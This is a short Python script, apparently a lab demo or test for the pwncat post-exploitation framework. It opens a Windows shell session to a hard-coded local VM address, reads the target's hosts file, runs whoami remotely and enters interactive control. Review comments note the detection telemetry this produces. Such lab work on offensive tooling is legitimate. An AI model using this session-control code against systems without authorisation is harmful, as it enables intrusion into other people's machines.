#!./env/bin/python
import subprocess
import pwncat.manager
import pwncat.platform.windows
import time
# --- Session setup ----------------------------------------------------------
# Build the pwncat manager; "data/pwncatrc" is its only argument
# (presumably the pwncat rc/config script -- confirm against Manager's API).
manager = pwncat.manager.Manager("data/pwncatrc")

# Open a Windows-platform session against a hard-coded endpoint.
# NOTE(review): 192.168.122.0/24 is libvirt's default NAT range, so this looks
# like a local lab VM; the address and port are not configurable from outside
# the script.
session = manager.create_session("windows", host="192.168.122.11", port=4444)

# manager.interactive()

# --- File read through the session ------------------------------------------
# The path object is produced by the session's platform rather than by the
# local pathlib, so open() is presumably served by the target host -- verify
# against the platform implementation.
hosts_path = (
    session.platform.Path("C:\\") / "Windows" / "System32" / "drivers" / "etc" / "hosts"
)
with hosts_path.open() as hosts_file:
    manager.log("Read etc hosts:")
    manager.log(hosts_file.read())

# --- Process execution through the session ----------------------------------
# Only the PIPE constant comes from the local subprocess module; the process
# itself is started via session.platform.Popen. text=True is requested so the
# captured output can be stripped as a str.
# On the target side, a whoami.exe launch like this is visible in
# process-creation telemetry (Windows Security event 4688, Sysmon event 1).
whoami_proc = session.platform.Popen(
    ["whoami.exe"],
    stdout=subprocess.PIPE,
    text=True,
)
whoami_out = whoami_proc.communicate()[0]
manager.log(f"Current user: {whoami_out.strip()}")
# returncode is read only after communicate() has returned.
manager.log(f"Process Exit Status: {whoami_proc.returncode}")

# Finish by entering the manager's interactive mode.
manager.interactive()